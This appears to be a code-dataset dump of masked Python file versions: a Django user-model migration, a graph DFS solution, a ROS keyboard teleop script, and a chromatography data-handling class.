models.DateField(auto_now_add=True, verbose_name=\n 'Дата регистрации')), ('is_active', models.BooleanField(default=\n True, verbose_name='Активен')), ('ip', models.GenericIPAddressField\n (blank=True, null=True, verbose_name='IP адрес')), ('surname',\n models.CharField(blank=True, max_length=50, verbose_name='Фамилия')\n ), ('first_name', models.CharField(blank=True, max_length=25,\n verbose_name='Имя')), ('middle_name', models.CharField(blank=True,\n max_length=25, verbose_name='Отчество')), ('groups', models.\n ManyToManyField(blank=True, help_text=\n 'The groups this user belongs to. A user will get all permissions granted to each of their groups.'\n , related_name='user_set', related_query_name='user', to=\n 'auth.Group', verbose_name='groups')), ('organisation', models.\n ForeignKey(blank=True, null=True, on_delete=django.db.models.\n deletion.CASCADE, to='enterprise.Organisation', verbose_name=\n 'Сотрудник организации')), ('user_permissions', models.\n ManyToManyField(blank=True, help_text=\n 'Specific permissions for this user.', related_name='user_set',\n related_query_name='user', to='auth.Permission', verbose_name=\n 'user permissions'))], options={'verbose_name': 'Пользователь',\n 'verbose_name_plural': 'Пользователи'})]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.6 on 2016-08-04 13:16\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('auth', '0007_alter_validators_add_error_messages'),\n ('enterprise', '0002_auto_20160804_1616'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('password', models.CharField(max_length=128, verbose_name='password')),\n ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),\n ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),\n ('email', models.EmailField(blank=True, max_length=255, unique=True, verbose_name='Электронная почта')),\n ('username', models.CharField(db_index=True, max_length=40, unique=True, verbose_name='Идентификатор')),\n ('created_at', models.DateField(auto_now_add=True, verbose_name='Дата регистрации')),\n ('is_active', models.BooleanField(default=True, verbose_name='Активен')),\n ('ip', models.GenericIPAddressField(blank=True, null=True, verbose_name='IP адрес')),\n ('surname', models.CharField(blank=True, max_length=50, verbose_name='Фамилия')),\n ('first_name', models.CharField(blank=True, max_length=25, verbose_name='Имя')),\n ('middle_name', models.CharField(blank=True, max_length=25, verbose_name='Отчество')),\n ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),\n ('organisation', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='enterprise.Organisation', verbose_name='Сотрудник организации')),\n ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),\n ],\n options={\n 'verbose_name': 'Пользователь',\n 'verbose_name_plural': 'Пользователи',\n },\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Time: O(|V| + |E|)
# Space: O(|V|)
class Solution(object):
def eventualSafeNodes(self, graph):
"""
:type graph: List[List[int]]
:rtype: List[int]
"""
WHITE, GRAY, BLACK = range(3)
def dfs(graph, node, lookup):
if lookup[node] != WHITE:
return lookup[node] == BLACK
lookup[node] = GRAY
if any(not dfs(graph, child, lookup) for child in graph[node]):
return False
lookup[node] = BLACK
return True
lookup = [WHITE]*len(graph)
return filter(lambda node: dfs(graph, node, lookup), xrange(len(graph)))
|
normal
|
{
"blob_id": "5c5cfcd240c8b05970dc8dff57bfbbdc98f1d100",
"index": 9838,
"step-1": "<mask token>\n",
"step-2": "class Solution(object):\n <mask token>\n",
"step-3": "class Solution(object):\n\n def eventualSafeNodes(self, graph):\n \"\"\"\n :type graph: List[List[int]]\n :rtype: List[int]\n \"\"\"\n WHITE, GRAY, BLACK = range(3)\n\n def dfs(graph, node, lookup):\n if lookup[node] != WHITE:\n return lookup[node] == BLACK\n lookup[node] = GRAY\n if any(not dfs(graph, child, lookup) for child in graph[node]):\n return False\n lookup[node] = BLACK\n return True\n lookup = [WHITE] * len(graph)\n return filter(lambda node: dfs(graph, node, lookup), xrange(len(graph))\n )\n",
"step-4": "# Time: O(|V| + |E|)\n# Space: O(|V|)\n\nclass Solution(object):\n def eventualSafeNodes(self, graph):\n \"\"\"\n :type graph: List[List[int]]\n :rtype: List[int]\n \"\"\"\n WHITE, GRAY, BLACK = range(3)\n\n def dfs(graph, node, lookup):\n if lookup[node] != WHITE:\n return lookup[node] == BLACK\n lookup[node] = GRAY\n if any(not dfs(graph, child, lookup) for child in graph[node]):\n return False\n lookup[node] = BLACK\n return True\n\n lookup = [WHITE]*len(graph)\n return filter(lambda node: dfs(graph, node, lookup), xrange(len(graph)))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class ChartType:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class ChartType:
Vanilla = 'Vanilla'
Neopolitan = 'Neopolitan'
<|reserved_special_token_1|>
class ChartType:
Vanilla = "Vanilla"
Neopolitan = "Neopolitan"
|
flexible
|
{
"blob_id": "451a36eb205a269a05e3b3d89541278633d12aaa",
"index": 9781,
"step-1": "<mask token>\n",
"step-2": "class ChartType:\n <mask token>\n <mask token>\n",
"step-3": "class ChartType:\n Vanilla = 'Vanilla'\n Neopolitan = 'Neopolitan'\n",
"step-4": "\n\nclass ChartType:\n Vanilla = \"Vanilla\"\n Neopolitan = \"Neopolitan\"\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
import rospy
from racecar_control.msg import drive_param
import curses
forward = 0;
left = 0;
stdscr = curses.initscr()
curses.cbreak()
stdscr.keypad(1)
rospy.init_node('keyop', anonymous=True)
pub = rospy.Publisher('drive_parameters', drive_param, queue_size=10)
stdscr.refresh()
key = ''
while key != ord('q'):
key = stdscr.getch()
stdscr.refresh()
if key == curses.KEY_UP:
forward = forward + 1;
if forward >= 40:
forward = 40
elif forward < -40:
forward = -40
stdscr.addstr(2, 20, "Up ")
stdscr.addstr(2, 25, '%.2f' % forward)
stdscr.addstr(5, 20, " ")
elif key == curses.KEY_DOWN:
forward = forward - 1;
if forward >= 40:
forward = 40
elif forward < -40:
forward = -40
stdscr.addstr(2, 20, "Down")
stdscr.addstr(2, 25, '%.2f' % forward)
stdscr.addstr(5, 20, " ")
if key == curses.KEY_LEFT:
left = left + 0.1;
if left >= 0.78:
left = 0.78
elif left < -0.78:
left = -0.78
stdscr.addstr(3, 20, "left")
stdscr.addstr(3, 25, '%.2f' % left)
stdscr.addstr(5, 20, " ")
elif key == curses.KEY_RIGHT:
left = left - 0.1;
if left >= 0.78:
left = 0.78
elif left < -0.78:
left = -0.78
stdscr.addstr(3, 20, "rgt ")
stdscr.addstr(3, 25, '%.2f' % left)
stdscr.addstr(5, 20, " ")
if key == curses.KEY_DC:
left = 0
forward = 0
stdscr.addstr(5, 20, "Stop")
msg = drive_param()
msg.velocity = forward
msg.angle = left
pub.publish(msg)
curses.endwin()
|
normal
|
{
"blob_id": "fb332808890e369d1439d1dba61244a0f7b89301",
"index": 4524,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncurses.cbreak()\nstdscr.keypad(1)\nrospy.init_node('keyop', anonymous=True)\n<mask token>\nstdscr.refresh()\n<mask token>\nwhile key != ord('q'):\n key = stdscr.getch()\n stdscr.refresh()\n if key == curses.KEY_UP:\n forward = forward + 1\n if forward >= 40:\n forward = 40\n elif forward < -40:\n forward = -40\n stdscr.addstr(2, 20, 'Up ')\n stdscr.addstr(2, 25, '%.2f' % forward)\n stdscr.addstr(5, 20, ' ')\n elif key == curses.KEY_DOWN:\n forward = forward - 1\n if forward >= 40:\n forward = 40\n elif forward < -40:\n forward = -40\n stdscr.addstr(2, 20, 'Down')\n stdscr.addstr(2, 25, '%.2f' % forward)\n stdscr.addstr(5, 20, ' ')\n if key == curses.KEY_LEFT:\n left = left + 0.1\n if left >= 0.78:\n left = 0.78\n elif left < -0.78:\n left = -0.78\n stdscr.addstr(3, 20, 'left')\n stdscr.addstr(3, 25, '%.2f' % left)\n stdscr.addstr(5, 20, ' ')\n elif key == curses.KEY_RIGHT:\n left = left - 0.1\n if left >= 0.78:\n left = 0.78\n elif left < -0.78:\n left = -0.78\n stdscr.addstr(3, 20, 'rgt ')\n stdscr.addstr(3, 25, '%.2f' % left)\n stdscr.addstr(5, 20, ' ')\n if key == curses.KEY_DC:\n left = 0\n forward = 0\n stdscr.addstr(5, 20, 'Stop')\n msg = drive_param()\n msg.velocity = forward\n msg.angle = left\n pub.publish(msg)\ncurses.endwin()\n",
"step-3": "<mask token>\nforward = 0\nleft = 0\nstdscr = curses.initscr()\ncurses.cbreak()\nstdscr.keypad(1)\nrospy.init_node('keyop', anonymous=True)\npub = rospy.Publisher('drive_parameters', drive_param, queue_size=10)\nstdscr.refresh()\nkey = ''\nwhile key != ord('q'):\n key = stdscr.getch()\n stdscr.refresh()\n if key == curses.KEY_UP:\n forward = forward + 1\n if forward >= 40:\n forward = 40\n elif forward < -40:\n forward = -40\n stdscr.addstr(2, 20, 'Up ')\n stdscr.addstr(2, 25, '%.2f' % forward)\n stdscr.addstr(5, 20, ' ')\n elif key == curses.KEY_DOWN:\n forward = forward - 1\n if forward >= 40:\n forward = 40\n elif forward < -40:\n forward = -40\n stdscr.addstr(2, 20, 'Down')\n stdscr.addstr(2, 25, '%.2f' % forward)\n stdscr.addstr(5, 20, ' ')\n if key == curses.KEY_LEFT:\n left = left + 0.1\n if left >= 0.78:\n left = 0.78\n elif left < -0.78:\n left = -0.78\n stdscr.addstr(3, 20, 'left')\n stdscr.addstr(3, 25, '%.2f' % left)\n stdscr.addstr(5, 20, ' ')\n elif key == curses.KEY_RIGHT:\n left = left - 0.1\n if left >= 0.78:\n left = 0.78\n elif left < -0.78:\n left = -0.78\n stdscr.addstr(3, 20, 'rgt ')\n stdscr.addstr(3, 25, '%.2f' % left)\n stdscr.addstr(5, 20, ' ')\n if key == curses.KEY_DC:\n left = 0\n forward = 0\n stdscr.addstr(5, 20, 'Stop')\n msg = drive_param()\n msg.velocity = forward\n msg.angle = left\n pub.publish(msg)\ncurses.endwin()\n",
"step-4": "import rospy\nfrom racecar_control.msg import drive_param\nimport curses\nforward = 0\nleft = 0\nstdscr = curses.initscr()\ncurses.cbreak()\nstdscr.keypad(1)\nrospy.init_node('keyop', anonymous=True)\npub = rospy.Publisher('drive_parameters', drive_param, queue_size=10)\nstdscr.refresh()\nkey = ''\nwhile key != ord('q'):\n key = stdscr.getch()\n stdscr.refresh()\n if key == curses.KEY_UP:\n forward = forward + 1\n if forward >= 40:\n forward = 40\n elif forward < -40:\n forward = -40\n stdscr.addstr(2, 20, 'Up ')\n stdscr.addstr(2, 25, '%.2f' % forward)\n stdscr.addstr(5, 20, ' ')\n elif key == curses.KEY_DOWN:\n forward = forward - 1\n if forward >= 40:\n forward = 40\n elif forward < -40:\n forward = -40\n stdscr.addstr(2, 20, 'Down')\n stdscr.addstr(2, 25, '%.2f' % forward)\n stdscr.addstr(5, 20, ' ')\n if key == curses.KEY_LEFT:\n left = left + 0.1\n if left >= 0.78:\n left = 0.78\n elif left < -0.78:\n left = -0.78\n stdscr.addstr(3, 20, 'left')\n stdscr.addstr(3, 25, '%.2f' % left)\n stdscr.addstr(5, 20, ' ')\n elif key == curses.KEY_RIGHT:\n left = left - 0.1\n if left >= 0.78:\n left = 0.78\n elif left < -0.78:\n left = -0.78\n stdscr.addstr(3, 20, 'rgt ')\n stdscr.addstr(3, 25, '%.2f' % left)\n stdscr.addstr(5, 20, ' ')\n if key == curses.KEY_DC:\n left = 0\n forward = 0\n stdscr.addstr(5, 20, 'Stop')\n msg = drive_param()\n msg.velocity = forward\n msg.angle = left\n pub.publish(msg)\ncurses.endwin()\n",
"step-5": "#!/usr/bin/env python\n\nimport rospy\nfrom racecar_control.msg import drive_param\nimport curses\n\nforward = 0;\nleft = 0;\n\n\nstdscr = curses.initscr()\ncurses.cbreak()\nstdscr.keypad(1)\nrospy.init_node('keyop', anonymous=True)\n\npub = rospy.Publisher('drive_parameters', drive_param, queue_size=10)\n\n\nstdscr.refresh()\n\nkey = ''\nwhile key != ord('q'):\n\n\tkey = stdscr.getch()\n\tstdscr.refresh()\n\n\tif key == curses.KEY_UP: \n\t\tforward = forward + 1;\n\t\tif forward >= 40:\n\t\t\tforward = 40\n\t\telif forward < -40:\n\t\t\tforward = -40\n\t\tstdscr.addstr(2, 20, \"Up \")\n\t\tstdscr.addstr(2, 25, '%.2f' % forward)\n\t\tstdscr.addstr(5, 20, \" \")\n\telif key == curses.KEY_DOWN:\n\t\tforward = forward - 1; \n\t\tif forward >= 40:\n\t\t\tforward = 40\n\t\telif forward < -40:\n\t\t\tforward = -40\n\t\tstdscr.addstr(2, 20, \"Down\")\n\t\tstdscr.addstr(2, 25, '%.2f' % forward)\n\t\tstdscr.addstr(5, 20, \" \")\n\tif key == curses.KEY_LEFT: \t\t\t\n\t\tleft = left + 0.1; \n\t\tif left >= 0.78:\n\t\t\tleft = 0.78\n\t\telif left < -0.78:\n\t\t\tleft = -0.78\n\t\tstdscr.addstr(3, 20, \"left\")\n\t\tstdscr.addstr(3, 25, '%.2f' % left)\n\t\tstdscr.addstr(5, 20, \" \")\n\telif key == curses.KEY_RIGHT:\n\t\tleft = left - 0.1; \n\t\tif left >= 0.78:\n\t\t\tleft = 0.78\n\t\telif left < -0.78:\n\t\t\tleft = -0.78\n\t\tstdscr.addstr(3, 20, \"rgt \")\n\t\tstdscr.addstr(3, 25, '%.2f' % left)\n\t\tstdscr.addstr(5, 20, \" \")\n\tif key == curses.KEY_DC:\n\t\tleft = 0\n\t\tforward = 0\n\t\tstdscr.addstr(5, 20, \"Stop\")\n\tmsg = drive_param()\n\tmsg.velocity = forward\n\tmsg.angle = left\n\tpub.publish(msg)\ncurses.endwin()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Experiment:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@hplc.setter
def hplc(self, df):
if isinstance(df, pd.DataFrame) or df is None:
try:
self._hplc = df.sort_values(by=['Normalization', 'Channel',
'mL'])
except AttributeError:
self._hplc = df
else:
raise TypeError('HPLC input is not a pandas dataframe')
@property
def fplc(self):
try:
return self._fplc
except AttributeError:
return None
<|reserved_special_token_0|>
@property
def wide(self):
wide = self.hplc.copy()
wide = wide.loc[wide['Normalization'] == 'Signal']
wide['Sample'] = wide['Sample'].astype(str) + ' ' + wide['Channel']
wide.drop(['Channel', 'Normalization'], axis=1)
wide = wide.pivot_table(index='Time', columns='Sample', values='Value')
return wide
def __repr__(self):
to_return = f'Experiment "{self.id}" with '
if self.hplc is not None:
to_return += 'HPLC '
if self.hplc is not None and self.fplc is not None:
to_return += 'and '
if self.fplc is not None:
to_return += 'FPLC '
if self.hplc is None and self.fplc is None:
to_return += 'no '
to_return += 'data'
return to_return
def extend_hplc(self, hplc):
if not isinstance(hplc, pd.DataFrame):
raise TypeError(
f'Tried to extend experiment hplc with {type(hplc)}')
self.hplc = pd.concat([self.hplc, hplc])
<|reserved_special_token_0|>
def jsonify(self):
if self.hplc is not None:
hplc_json = self.hplc.pivot_table(index=['mL', 'Channel',
'Time', 'Normalization'], columns='Sample', values='Value'
).reset_index().to_json()
else:
hplc_json = ''
if self.fplc is not None:
fplc_json = self.fplc.to_json()
else:
fplc_json = ''
doc = {'_id': self.id, 'version': self.version, 'hplc': hplc_json,
'fplc': fplc_json}
return doc
<|reserved_special_token_0|>
def renormalize_fplc(self, norm_range, strict):
if self.fplc is None:
raise ValueError('No FPLC data')
fplc = self.fplc.pivot(index=['mL', 'CV', 'Fraction', 'Channel',
'Sample'], columns=['Normalization'])['Value'].reset_index()
fplc = fplc.groupby(['Sample', 'Channel'], group_keys=False).apply(
lambda x: normalizer(x, norm_range, strict))
fplc = fplc.melt(id_vars=['mL', 'CV', 'Channel', 'Fraction',
'Sample'], value_vars=['Signal', 'Normalized'], var_name=
'Normalization', value_name='Value')
self.fplc = fplc
def reduce_hplc(self, num_points):
def reduction_factor(df, final_points):
reduction_factor = ceil(df.shape[0] / final_points)
return df[::reduction_factor]
try:
self.hplc = self.hplc.groupby(['Channel', 'Sample',
'Normalization'], group_keys=False, as_index=False).apply(
lambda x: reduction_factor(x, num_points))
self.hplc = self.hplc.reset_index(drop=True)
except AttributeError:
return
def rename_channels(self, channel_name_dict):
self.hplc = self.hplc.replace({'Channel': channel_name_dict})
def hplc_csv(self, outfile):
if outfile[-4:] == '.csv':
outfile = outfile[:-4]
if self.hplc is not None:
self.hplc.to_csv(outfile + '-long.csv', index=False)
self.wide.to_csv(outfile + '-wide.csv', index=True)
return outfile + '-long.csv'
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Experiment:
def __init__(self, id) ->None:
self.id = id
self.version = 4
self._hplc = None
self._fplc = None
@property
def hplc(self):
try:
return self._hplc
except AttributeError:
return None
@hplc.setter
def hplc(self, df):
if isinstance(df, pd.DataFrame) or df is None:
try:
self._hplc = df.sort_values(by=['Normalization', 'Channel',
'mL'])
except AttributeError:
self._hplc = df
else:
raise TypeError('HPLC input is not a pandas dataframe')
@property
def fplc(self):
try:
return self._fplc
except AttributeError:
return None
<|reserved_special_token_0|>
@property
def wide(self):
wide = self.hplc.copy()
wide = wide.loc[wide['Normalization'] == 'Signal']
wide['Sample'] = wide['Sample'].astype(str) + ' ' + wide['Channel']
wide.drop(['Channel', 'Normalization'], axis=1)
wide = wide.pivot_table(index='Time', columns='Sample', values='Value')
return wide
def __repr__(self):
to_return = f'Experiment "{self.id}" with '
if self.hplc is not None:
to_return += 'HPLC '
if self.hplc is not None and self.fplc is not None:
to_return += 'and '
if self.fplc is not None:
to_return += 'FPLC '
if self.hplc is None and self.fplc is None:
to_return += 'no '
to_return += 'data'
return to_return
def extend_hplc(self, hplc):
if not isinstance(hplc, pd.DataFrame):
raise TypeError(
f'Tried to extend experiment hplc with {type(hplc)}')
self.hplc = pd.concat([self.hplc, hplc])
<|reserved_special_token_0|>
def jsonify(self):
if self.hplc is not None:
hplc_json = self.hplc.pivot_table(index=['mL', 'Channel',
'Time', 'Normalization'], columns='Sample', values='Value'
).reset_index().to_json()
else:
hplc_json = ''
if self.fplc is not None:
fplc_json = self.fplc.to_json()
else:
fplc_json = ''
doc = {'_id': self.id, 'version': self.version, 'hplc': hplc_json,
'fplc': fplc_json}
return doc
def renormalize_hplc(self, norm_range, strict):
if self.hplc is None:
raise ValueError('No HPLC data')
hplc = self.hplc.pivot(index=['mL', 'Sample', 'Channel', 'Time'],
columns=['Normalization'])['Value'].reset_index()
hplc = hplc.groupby(['Sample', 'Channel'], group_keys=False).apply(
lambda x: normalizer(x, norm_range, strict))
hplc = hplc.melt(id_vars=['mL', 'Sample', 'Channel', 'Time'],
value_vars=['Signal', 'Normalized'], var_name='Normalization',
value_name='Value')
self.hplc = hplc
def renormalize_fplc(self, norm_range, strict):
if self.fplc is None:
raise ValueError('No FPLC data')
fplc = self.fplc.pivot(index=['mL', 'CV', 'Fraction', 'Channel',
'Sample'], columns=['Normalization'])['Value'].reset_index()
fplc = fplc.groupby(['Sample', 'Channel'], group_keys=False).apply(
lambda x: normalizer(x, norm_range, strict))
fplc = fplc.melt(id_vars=['mL', 'CV', 'Channel', 'Fraction',
'Sample'], value_vars=['Signal', 'Normalized'], var_name=
'Normalization', value_name='Value')
self.fplc = fplc
def reduce_hplc(self, num_points):
def reduction_factor(df, final_points):
reduction_factor = ceil(df.shape[0] / final_points)
return df[::reduction_factor]
try:
self.hplc = self.hplc.groupby(['Channel', 'Sample',
'Normalization'], group_keys=False, as_index=False).apply(
lambda x: reduction_factor(x, num_points))
self.hplc = self.hplc.reset_index(drop=True)
except AttributeError:
return
def rename_channels(self, channel_name_dict):
self.hplc = self.hplc.replace({'Channel': channel_name_dict})
def hplc_csv(self, outfile):
if outfile[-4:] == '.csv':
outfile = outfile[:-4]
if self.hplc is not None:
self.hplc.to_csv(outfile + '-long.csv', index=False)
self.wide.to_csv(outfile + '-wide.csv', index=True)
return outfile + '-long.csv'
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Experiment:
def __init__(self, id) ->None:
self.id = id
self.version = 4
self._hplc = None
self._fplc = None
@property
def hplc(self):
try:
return self._hplc
except AttributeError:
return None
@hplc.setter
def hplc(self, df):
if isinstance(df, pd.DataFrame) or df is None:
try:
self._hplc = df.sort_values(by=['Normalization', 'Channel',
'mL'])
except AttributeError:
self._hplc = df
else:
raise TypeError('HPLC input is not a pandas dataframe')
@property
def fplc(self):
try:
return self._fplc
except AttributeError:
return None
@fplc.setter
def fplc(self, df):
if isinstance(df, pd.DataFrame) or df is None:
self._fplc = df
else:
raise TypeError('FPLC input is not a pandas dataframe')
@property
def wide(self):
wide = self.hplc.copy()
wide = wide.loc[wide['Normalization'] == 'Signal']
wide['Sample'] = wide['Sample'].astype(str) + ' ' + wide['Channel']
wide.drop(['Channel', 'Normalization'], axis=1)
wide = wide.pivot_table(index='Time', columns='Sample', values='Value')
return wide
def __repr__(self):
to_return = f'Experiment "{self.id}" with '
if self.hplc is not None:
to_return += 'HPLC '
if self.hplc is not None and self.fplc is not None:
to_return += 'and '
if self.fplc is not None:
to_return += 'FPLC '
if self.hplc is None and self.fplc is None:
to_return += 'no '
to_return += 'data'
return to_return
def extend_hplc(self, hplc):
if not isinstance(hplc, pd.DataFrame):
raise TypeError(
f'Tried to extend experiment hplc with {type(hplc)}')
self.hplc = pd.concat([self.hplc, hplc])
def show_tables(self):
print('HPLC:')
print(self.hplc)
print('FPLC:')
print(self.fplc)
def jsonify(self):
if self.hplc is not None:
hplc_json = self.hplc.pivot_table(index=['mL', 'Channel',
'Time', 'Normalization'], columns='Sample', values='Value'
).reset_index().to_json()
else:
hplc_json = ''
if self.fplc is not None:
fplc_json = self.fplc.to_json()
else:
fplc_json = ''
doc = {'_id': self.id, 'version': self.version, 'hplc': hplc_json,
'fplc': fplc_json}
return doc
def renormalize_hplc(self, norm_range, strict):
if self.hplc is None:
raise ValueError('No HPLC data')
hplc = self.hplc.pivot(index=['mL', 'Sample', 'Channel', 'Time'],
columns=['Normalization'])['Value'].reset_index()
hplc = hplc.groupby(['Sample', 'Channel'], group_keys=False).apply(
lambda x: normalizer(x, norm_range, strict))
hplc = hplc.melt(id_vars=['mL', 'Sample', 'Channel', 'Time'],
value_vars=['Signal', 'Normalized'], var_name='Normalization',
value_name='Value')
self.hplc = hplc
def renormalize_fplc(self, norm_range, strict):
if self.fplc is None:
raise ValueError('No FPLC data')
fplc = self.fplc.pivot(index=['mL', 'CV', 'Fraction', 'Channel',
'Sample'], columns=['Normalization'])['Value'].reset_index()
fplc = fplc.groupby(['Sample', 'Channel'], group_keys=False).apply(
lambda x: normalizer(x, norm_range, strict))
fplc = fplc.melt(id_vars=['mL', 'CV', 'Channel', 'Fraction',
'Sample'], value_vars=['Signal', 'Normalized'], var_name=
'Normalization', value_name='Value')
self.fplc = fplc
def reduce_hplc(self, num_points):
def reduction_factor(df, final_points):
reduction_factor = ceil(df.shape[0] / final_points)
return df[::reduction_factor]
try:
self.hplc = self.hplc.groupby(['Channel', 'Sample',
'Normalization'], group_keys=False, as_index=False).apply(
lambda x: reduction_factor(x, num_points))
self.hplc = self.hplc.reset_index(drop=True)
except AttributeError:
return
def rename_channels(self, channel_name_dict):
self.hplc = self.hplc.replace({'Channel': channel_name_dict})
def hplc_csv(self, outfile):
if outfile[-4:] == '.csv':
outfile = outfile[:-4]
if self.hplc is not None:
self.hplc.to_csv(outfile + '-long.csv', index=False)
self.wide.to_csv(outfile + '-wide.csv', index=True)
return outfile + '-long.csv'
def fplc_csv(self, outfile):
if outfile[-4:] != '.csv':
outfile = outfile + '.csv'
if self.fplc is not None:
self.fplc.to_csv(outfile, index=False)
return outfile
def save_csvs(self, path):
hplc_csv = self.hplc_csv(os.path.join(path, f'{self.id}_hplc'))
fplc_csv = self.fplc_csv(os.path.join(path, f'{self.id}_fplc'))
return hplc_csv, fplc_csv
def concat_experiments(exp_list):
hplcs = []
fplcs = []
for exp in [x for x in exp_list if x.hplc is not None]:
hplc = exp.hplc
hplc['Sample'] = f'{exp.id}: ' + hplc['Sample'].astype(str)
hplcs.append(hplc)
for exp in [x for x in exp_list if x.fplc is not None]:
fplc = exp.fplc
fplc['Sample'] = exp.id
fplcs.append(fplc)
concat_exp = Experiment('concat')
try:
concat_exp.hplc = pd.concat(hplcs)
except ValueError:
pass
try:
concat_exp.fplc = pd.concat(fplcs)
except ValueError:
pass
return concat_exp
<|reserved_special_token_1|>
import pandas as pd
import os
from appia.processors.core import normalizer
from math import ceil
class Experiment:
def __init__(self, id) ->None:
self.id = id
self.version = 4
self._hplc = None
self._fplc = None
@property
def hplc(self):
try:
return self._hplc
except AttributeError:
return None
@hplc.setter
def hplc(self, df):
if isinstance(df, pd.DataFrame) or df is None:
try:
self._hplc = df.sort_values(by=['Normalization', 'Channel',
'mL'])
except AttributeError:
self._hplc = df
else:
raise TypeError('HPLC input is not a pandas dataframe')
@property
def fplc(self):
try:
return self._fplc
except AttributeError:
return None
@fplc.setter
def fplc(self, df):
if isinstance(df, pd.DataFrame) or df is None:
self._fplc = df
else:
raise TypeError('FPLC input is not a pandas dataframe')
@property
def wide(self):
wide = self.hplc.copy()
wide = wide.loc[wide['Normalization'] == 'Signal']
wide['Sample'] = wide['Sample'].astype(str) + ' ' + wide['Channel']
wide.drop(['Channel', 'Normalization'], axis=1)
wide = wide.pivot_table(index='Time', columns='Sample', values='Value')
return wide
def __repr__(self):
to_return = f'Experiment "{self.id}" with '
if self.hplc is not None:
to_return += 'HPLC '
if self.hplc is not None and self.fplc is not None:
to_return += 'and '
if self.fplc is not None:
to_return += 'FPLC '
if self.hplc is None and self.fplc is None:
to_return += 'no '
to_return += 'data'
return to_return
def extend_hplc(self, hplc):
if not isinstance(hplc, pd.DataFrame):
raise TypeError(
f'Tried to extend experiment hplc with {type(hplc)}')
self.hplc = pd.concat([self.hplc, hplc])
def show_tables(self):
print('HPLC:')
print(self.hplc)
print('FPLC:')
print(self.fplc)
def jsonify(self):
if self.hplc is not None:
hplc_json = self.hplc.pivot_table(index=['mL', 'Channel',
'Time', 'Normalization'], columns='Sample', values='Value'
).reset_index().to_json()
else:
hplc_json = ''
if self.fplc is not None:
fplc_json = self.fplc.to_json()
else:
fplc_json = ''
doc = {'_id': self.id, 'version': self.version, 'hplc': hplc_json,
'fplc': fplc_json}
return doc
def renormalize_hplc(self, norm_range, strict):
if self.hplc is None:
raise ValueError('No HPLC data')
hplc = self.hplc.pivot(index=['mL', 'Sample', 'Channel', 'Time'],
columns=['Normalization'])['Value'].reset_index()
hplc = hplc.groupby(['Sample', 'Channel'], group_keys=False).apply(
lambda x: normalizer(x, norm_range, strict))
hplc = hplc.melt(id_vars=['mL', 'Sample', 'Channel', 'Time'],
value_vars=['Signal', 'Normalized'], var_name='Normalization',
value_name='Value')
self.hplc = hplc
def renormalize_fplc(self, norm_range, strict):
if self.fplc is None:
raise ValueError('No FPLC data')
fplc = self.fplc.pivot(index=['mL', 'CV', 'Fraction', 'Channel',
'Sample'], columns=['Normalization'])['Value'].reset_index()
fplc = fplc.groupby(['Sample', 'Channel'], group_keys=False).apply(
lambda x: normalizer(x, norm_range, strict))
fplc = fplc.melt(id_vars=['mL', 'CV', 'Channel', 'Fraction',
'Sample'], value_vars=['Signal', 'Normalized'], var_name=
'Normalization', value_name='Value')
self.fplc = fplc
def reduce_hplc(self, num_points):
def reduction_factor(df, final_points):
reduction_factor = ceil(df.shape[0] / final_points)
return df[::reduction_factor]
try:
self.hplc = self.hplc.groupby(['Channel', 'Sample',
'Normalization'], group_keys=False, as_index=False).apply(
lambda x: reduction_factor(x, num_points))
self.hplc = self.hplc.reset_index(drop=True)
except AttributeError:
return
def rename_channels(self, channel_name_dict):
self.hplc = self.hplc.replace({'Channel': channel_name_dict})
def hplc_csv(self, outfile):
if outfile[-4:] == '.csv':
outfile = outfile[:-4]
if self.hplc is not None:
self.hplc.to_csv(outfile + '-long.csv', index=False)
self.wide.to_csv(outfile + '-wide.csv', index=True)
return outfile + '-long.csv'
def fplc_csv(self, outfile):
if outfile[-4:] != '.csv':
outfile = outfile + '.csv'
if self.fplc is not None:
self.fplc.to_csv(outfile, index=False)
return outfile
def save_csvs(self, path):
hplc_csv = self.hplc_csv(os.path.join(path, f'{self.id}_hplc'))
fplc_csv = self.fplc_csv(os.path.join(path, f'{self.id}_fplc'))
return hplc_csv, fplc_csv
def concat_experiments(exp_list):
hplcs = []
fplcs = []
for exp in [x for x in exp_list if x.hplc is not None]:
hplc = exp.hplc
hplc['Sample'] = f'{exp.id}: ' + hplc['Sample'].astype(str)
hplcs.append(hplc)
for exp in [x for x in exp_list if x.fplc is not None]:
fplc = exp.fplc
fplc['Sample'] = exp.id
fplcs.append(fplc)
concat_exp = Experiment('concat')
try:
concat_exp.hplc = pd.concat(hplcs)
except ValueError:
pass
try:
concat_exp.fplc = pd.concat(fplcs)
except ValueError:
pass
return concat_exp
<|reserved_special_token_1|>
import pandas as pd
import os
from appia.processors.core import normalizer
from math import ceil
class Experiment:
